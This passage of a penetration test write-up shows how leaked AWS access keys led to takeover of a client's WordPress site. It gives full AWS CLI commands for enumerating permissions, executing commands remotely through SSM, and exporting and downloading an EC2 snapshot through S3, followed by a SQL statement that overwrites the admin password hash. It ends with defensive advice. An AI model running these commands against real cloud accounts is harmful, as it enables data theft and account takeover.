aws iam list-users --profile compromisedThe above output showed I had access to client’s AWS infrastructure via access keys. Getting access to these keys is really good from an attacker’s point of view because generally they are considered more secure than common passwords and thus are not protected by MFA (although this is one of the best practices recommended by AWS). In this case a second factor was not required to access the AWS infrastructure. The next step was to understand the level of access that I had. The following command showed that I had administrative permissions on EC2 and S3:
aws iam list-policies --profile | grep "PolicyName" | grep -i EC2For completeness you can use the following AWS CLI commands to identify the level of access that you have:
aws iam list-groups-for-user --user-name aws iam list-attached-group-policies --group-name aws iam list-group-policies --group-name aws iam list-attached-user-policies --user-name aws iam list-user-policies --user-nameLike any cloud platform you can decide which country (region in AWS language) you want to host your infrastructure. In order to discovery where the AWS EC2 instance running the website was hosted I ran the following bash one-liner which listed EC2 instances across all regions:
for region in `aws ec2 describe-regions --output text --profile compromised| cut -f4`; do echo -e "\nListing Instances in region:'$region'..."; aws ec2 describe- instances --region $region; doneIn an environment with lots of EC2 instances running, identifying the correct one that you want to target might be a little bit challenging. Probably the simplest way is to crosscheck the public IP of the target website with the public IP address assigned to EC2 network interface. I was able to find a match so I was sure that EC2 instance (i-0**************8) was hosting the WordPress that I wanted to compromise, as shown below: At this stage I thought the following options in order to take over the EC2 instance:
1. Dump private SSH key via AWS CLI. This is not actually possible because AWS does not store private keys.
2. Create a new private SSH key. This was not a valuable option because it required to stop the running EC2 instance and relaunched it with the specified key pair and I didn’t want to cause any disruptions. However, it is worth mentioning that if the ec2-instance-connect was installed, I did not need to relaunch the EC2 to attach a new key pair.
3. Send OS commands directly to EC2 instance using SSM. Unfortunately this was not a valuable option either as the SSM agent needed to be installed on the EC2 instance. If you are lucky and the SSM agent is installed you can use the following commands to execute a command to the EC2 instance and retrieve the output respectively:
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document- name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile YOUR-PROFILE
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" -- details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile YOUR-PROFILE
4. Create a snapshot of the EC2 instance, share it to a AWS account that I control, and download it. However, it requires an AWS account and I didn’t want to create one specifically for this task.
5. Create a snapshot of the EC2 instance into a S3 bucket and then download it. It is worth mentioning that AWS tenants pay for storage. Before diving into this it is worth checking the size of the EC2 instance and the cost implications. I decided to go with this option as it seemed the quickest one and the EC2 instance was less than 5 GB.
The first step was to create the S3 bucket using the command “aws s3 mb s3://vm-export-0 –profile compromised –region eu-west-2”. I then listed the S3 bucket to ensure that the S3 bucket was created. Then I took advantage of the “create-instance-export-task” to create a snapshot of the running EC2 instance and place it in the S3 bucket. As part of the command I specified the following “s3bucket.txt” file which contained instructions on the type of format of the snapshot, as you can export it in several different formats (VMDK,VHD or RAW). First give read and write permissions to the “[email protected]” account (id=c4d8eab..322) on the S3 bucket with the following command:aws s3api put-bucket-acl --bucket vm-export-0 --grant-full-control id=c4d8eabf8db69dbe46bfe0e517100c554f01200b104d59cd408e777ba442a322 --profile compromised --region eu-west-2Then create the snapshot to put in the S3 bucket:
aws ec2 create-instance-export-task --instance-id i-*************308 --target-environment vmware --export-to-s3-task file://s3bucket.txt --profile compromised --region eu-west-2Once this was done, the export task was created and was running in the background. This was a fairly long wait (approximately 20 minutes) to create the snapshot. I used the following command to check the state of the export task.
aws ec2 describe-export-tasks --export-task-ids export-i-0c***********4c -- profile compromised --region eu-west-2When the task was complete, I could see the new snapshot in the S3 bucket:
aws s3 ls --profile compromised vm-export-0Then I proceed with downloading the snapshot.
aws s3api get-object --bucket vm-export-0 --key vmexport-i-0***************c.ova vmexport-i- 0****************c.ova --profile compromisedOnce this was done, I cleaned up by deleting the S3 bucket:
aws s3 rb s3://vm-export-0 --force --profile compromisedOn my local machine I extracted the OVA file and mounted the VMDK on my file system as shown below: Then in the WordPress folder I found the “wp-config.php” containing database credentials: Unfortunately for my client the SQL database was exposed on the Internet so I was able to remotely login. This allowed me to easily take over of admin account of the WordPress site by changing the password hash with one that I knew the clear-text password.
UPDATE wp_users SET user_pass = '$P$*********************v/' WHERE id= '1';Then I jumped to the “/wp-admin/” directory of the target website and I logged in as an administrator: I then changed the password hash of the Admin account back to the original value to ensure that the client could also login. This was an interesting journey which has shown that:
- Mobile apps are often left out from a secure software development cycle and not thoroughly reviewed.
- Keys are typically considered more secure than passwords and thus MFA is not enforced.
- Vulnerabilities in a mobile app can lead to full compromise of a cloud service account, not just the mobile app.
- Have an application security design review prior to application development.
- Regularly review use of access keys and treat them the same as credentials.
- Have regular cloud security assessments to pick up common security risks and security risks specific to cloud service providers.
- Have penetration tests on mobile apps and related infrastructure.